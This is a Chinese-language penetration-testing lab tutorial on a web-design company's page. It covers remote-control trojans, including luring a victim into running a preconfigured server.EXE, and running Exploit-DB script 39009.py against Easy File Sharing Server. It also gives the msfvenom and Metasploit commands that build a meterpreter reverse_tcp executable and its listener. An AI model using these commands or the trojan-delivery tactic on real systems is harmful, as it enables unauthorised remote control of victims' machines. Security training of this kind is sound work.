连云港市网站建设_网站建设公司_论坛网站_seo优化
2025/12/30 3:53:07 网站建设 项目流程

一.远程控制-正向连接方式-黑客(客户端)先主动连接木马(服务端)

二.远程控制-反向连接-主动连接黑客(客户端)

诱使Rebecca

下载server.EXE并运行

server.EXE已配置

Yuri的IP地址和端口

三.easy file sharing server漏洞渗透测试

在windows上安装easy file sharing server

然后查询靶机(windows)的IP地址

在靶机上打开easy file sharing server,然后再打开kali的终端用nmap 扫描目标主机开放的端口,输入命令【nmap -sV [IP]】

发现80端口上运行了easy file sharing server

然后searchsploit查EasyFileSharing存在的漏洞,输入【searchsploit easy file sharing server】

以该漏洞为例,利用该漏洞使得靶机运行计算器

现在执行这个python脚本,执行时需要提供两个参数(靶机IP和目标端口),输入【python2 /usr/share/exploitdb/exploits/windows/remote/39009.py [靶机IP] 80】,执行该命令后渗透模块会连接到【目标IP】的80端口,将指定代码送过去

可以看到我们已经启动了计算器。

四.kali中生成被控端

Msfvenom 用到参数-p、-f 、-o

-p windows/meterpreter/reverse_tcp LHOST=192.168.182.3 LPORT=5000 -f exe –o /root/payload.exe

-p, –payload Payload to use;指定哪些有效载荷生成

本例中 windows/meterpreter/reverse_tcp :用于Windows平台的反向远程控制程序

-f, –format Output format;指定有效载荷的格式

本例中 exe 生成Windows系统的可执行文件

-o, –out Save the payload;指定保存位置

本例中 /root/payload.exe

1.首先ifconfig查看kali的IP地址

2.输入命令msfvenom -p windows/meterpreter/reverse_tcp lhost=【IP地址】lport=5000 -f exe -o /var/payload.exe,可以看到生成的被控端程序文件在var目录下

3.直接输入msfconsole命令启动Metasploit

4.依次输入use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 【IP地址】

set lport 5000

exploit

主控端启动完成

5.将生成的被控端提交到www.virustotal.com检测

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询